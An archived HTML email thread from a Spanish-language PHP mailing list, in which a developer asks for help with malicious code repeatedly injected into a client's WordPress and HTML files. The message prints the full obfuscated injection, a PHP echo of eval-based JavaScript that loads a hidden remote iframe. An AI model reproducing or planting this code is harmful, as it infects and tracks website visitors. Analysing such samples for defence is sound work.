<html>
<head>
<style><!--
.hmmessage P
{
margin:0px;
padding:0px
}
body.hmmessage
{
font-size: 12pt;
font-family:Calibri
}
--></style></head>
<body class='hmmessage'><div dir='ltr'>Este es el codigo que me copia en todos los archivos, ahora tambien lo encontre en algunos archivos htm, html o index.php<br><br>#0f2490#<br>                                                                                                                                                                                                                                                                                                                                                                                                                if(empty($id)) { $id = "<script type=\"text/javascript\" language=\"javascript\" >z=\"y\";vz=\"d\"+\"oc\"+\"ument\";ps=\"s\"+\"plit\";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff=\"fr\"+\"omCh\"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v=\"0x\";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)[\"\x62od\"+z]}catch(q){a2=\"_\";}z=\"2d_73_82_7b_70_81_76_7c_7b_2d_86_7c_85_71_81_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_2d_83_6e_7f_2d_86_7c_85_71_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7f_72_6e_81_72_52_79_72_7a_72_7b_81_35_34_76_73_7f_6e_7a_72_34_36_48_1a_17_1a_17_2d_86_7c_85_71_81_3b_80_7f_70_2d_4a_2d_34_75_81_81_7d_47_3c_3c_75_6f_78_7c_7f_7d_80_3b_80_70_75_72_76_7f_7c_3b_71_72_3c_5f_59_74_66_4f_85_65_41_3b_7d_75_7d_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_7d_7c_80_76_81_76_7c_7b_2d_4a_2d_34_6e_6f_80_7c_79_82_81_72_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_70_7c_79_7c_7f_2d_4a_2d_34_45_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_75_72_76_74_75_81_2d_4a_2d_34_45_7d_85_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_84_76_71_81_75_2d_4a_2d_34_45_7d_85_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_79_72_73_81_2d_4a_2d_34_3e_3d_3d_3d_45_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_81_7c_7d_2d_4a_2d_34_3e_3d_3d_3d_45_34_48_1a_17_1a_17_2d_76_73_2d_35_2e_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_86_7c_85_71_81_34_36_36_2d_88_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_84_7f_76_81_72_35_34_49_7d_2d_76_71_4a_69_34_86_7c_85_71_81_69_34_2d_70_79_6e_80_80_4a_69_34_86_7c_85_71_81_3d_46_69_34_2d_4b_49_3c_7d_4b_34_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_86_7c_85_71_81_34_36_3b_6e_7d_7d_72_7b_71_50_75_76_79_71_35_86_7c_85_71_81_36_48_1a_17_2d_8a_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_60_72_81_50_7c_7c_78_76_72_35_70_7c_7c_78_76_72_5b_6e_7a_72_39_70_7c_7c_78_76_72_63_6e_79_82_72_39_7b_51_6e_86_80_39_7d_6e_81_75_36_2d_88_1a_17_2d_83_6e_7f_2d_81_7c_71_6e_86_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_83_6e_7f_2d_72_85_7d_76_7f_72_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_76_73_2d_35_7b_51_6e_86_80_4a_4a_7b_82_79_79_2d_89_89_2d_7b_51_6e_86_80_4a_4a_3d_36_2d_7b_51_6e_86_80_4a_3e_48_1a_17_2d_72_85_7d_76_7f_72_3b_80_72_81_61_76_7a_72_35_81_7c_71_6e_86_3b_74_72_81_61_76_7a_72_35_36_2d_38_2d_40_43_3d_3d_3d_3d_3d_37_3f_41_37_7b_51_6e_86_80_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_2d_4a_2d_70_7c_7c_78_76_72_5b_6e_7a_72_38_2f_4a_2f_38_72_80_70_6e_7d_72_35_70_7c_7c_78_76_72_63_6e_79_82_72_36_1a_17_2d_38_2d_2f_48_72_85_7d_76_7f_72_80_4a_2f_2d_38_2d_72_85_7d_76_7f_72_3b_81_7c_54_5a_61_60_81_7f_76_7b_74_35_36_2d_38_2d_35_35_7d_6e_81_75_36_2d_4c_2d_2f_48_2d_7d_6e_81_75_4a_2f_2d_38_2d_7d_6e_81_75_2d_47_2d_2f_2f_36_48_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_54_72_81_50_7c_7c_78_76_72_35_2d_7b_6e_7a_72_2d_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_7f_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_7b_6e_7a_72_2d_38_2d_2f_4a_2f_2d_36_48_1a_17_2d_83_6e_7f_2d_79_72_7b_2d_4a_2d_80_81_6e_7f_81_2d_38_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_38_2d_3e_48_1a_17_2d_76_73_2d_35_2d_35_2d_2e_80_81_6e_7f_81_2d_36_2d_33_33_1a_17_2d_35_2d_7b_6e_7a_72_2d_2e_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_3d_39_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_36_2d_36_2d_36_1a_17_2d_88_1a_17_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_8a_1a_17_2d_76_73_2d_35_2d_80_81_6e_7f_81_2d_4a_4a_2d_3a_3e_2d_36_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_83_6e_7f_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_2f_48_2f_39_2d_79_72_7b_2d_36_48_1a_17_2d_76_73_2d_35_2d_72_7b_71_2d_4a_4a_2d_3a_3e_2d_36_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_79_72_7b_74_81_75_48_1a_17_2d_7f_72_81_82_7f_7b_2d_82_7b_72_80_70_6e_7d_72_35_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_86_7c_85_71_81_3d_46_35_36_48_1a_17_8a_1a_17_8a\"[ps](a2);za=\"\";aa(\"arCode\");e(\"\"+za);}</script>"; echo $id; }<br><br>#/0f2490#<br><br><pre class="ecxmoz-signature"><font style="" color="#2672EC"><b><font style="" face="Verdana"><font style="" color="#000000">Piñeiro, Juan Manuel</font>
Aliweb - Desarrollo de Software
Cel (0223) 155 704568
Web </font><font style="" face="Verdana"><a class="ecxmoz-txt-link-abbreviated" href="http://www.aliweb.com.ar" target="_blank">www.aliweb.com.ar</a></font><font style="" face="Verdana">
Mar del Plata | Argentina</font></b></font></pre><br><br><div>> From: leonardot@pegasusnet.com.ar<br>> To: php-avanzado@pato2.fi.mdp.edu.ar<br>> Date: Thu, 15 Aug 2013 16:27:12 -0300<br>> Subject: Re: [Php-avanzado] Ayuda codigo malicioso Js<br>> <br>> Hola Juan Manuel,<br>> <br>>   esto es típico de cuando alguien que tiene configurado en su PC un<br>> cliente FTP con la clave del sitio tiene un virus.<br>>       El virus se conecta vía FTP y modifica los scripts.<br>> <br>> <br>> PD: la lista no tiene ninguna restricción de contenido y podés enviar<br>> por acá el código malicioso. La única restricción es del tamaño del<br>> mail. Te da algún error?<br>> <br>> <br>> El jue, 15-08-2013 a las 00:59 -0300, Juan Manuel P. escribió:<br>> > Buenas noches, quisiera hacer una consulta a la lista, para saber si<br>> > alguien tiene alguna idea de donde puede provenir el problema.<br>> > <br>> > Tengo un cliente que tiene su sitio en wordpress, ya lo tenia cuando<br>> > lo contacte y quizo seguir con esta plataforma, por lo que le<br>> > desarrolle una plantilla (en una primera etapa de la pagina principal,<br>> > estamos con una segunda etapa de la vista interna del sitio).<br>> > <br>> > El problema me esta sucediendo desde hace una semana es que no<br>> > entiendo como es que de repente se agrega codigo malicioso (codigo<br>> > javascript que los antivirus lo detectan como virus), y aclaro que de<br>> > repente porque de la nada he visto agregado codigo en el archivo<br>> > header.php y he visto como se borra codigo que yo mismo habia escrito<br>> > en ese archivo.<br>> > <br>> > Hoy, a diferencia de la semana pasada, me encontre con una marca que<br>> > me sorprendio y la google pero no encontre la fuente del problema.<br>> > <br>> > No dejo el codigo que se inserta en cada uno de estos archivos (porque<br>> > se copia en cada una de los archivos header.php de TODAS las<br>> > plantillas instaladas) porque la lista no me permite pero empieza con<br>> > esta etiqueta #0f2490# el marcado de donde inicia y donde termina.<br>> > <br>> > Piñeiro, Juan Manuel<br>> > Aliweb - Desarrollo de Software<br>> > Cel (0223) 155 704568<br>> > Web www.aliweb.com.ar<br>> > Mar del Plata | Argentina<br>> > _______________________________________________<br>> > Php-avanzado mailing list<br>> > Php-avanzado@pato2.fi.mdp.edu.ar<br>> > http://www3.fi.mdp.edu.ar/cgi-bin/mailman/listinfo/php-avanzado<br>> <br>> -- <br>> Leonardo Tadei<br>> leonardot@pegasusnet.com.ar<br>> Web: http://leonardo.tadei.com.ar<br>> Firma pública: http://www.pegasusnet.com.ar/LeonardoTadei-public.key<br>> <br>> _______________________________________________<br>> Php-avanzado mailing list<br>> Php-avanzado@pato2.fi.mdp.edu.ar<br>> http://www3.fi.mdp.edu.ar/cgi-bin/mailman/listinfo/php-avanzado<br></div>                                           </div></body>
</html>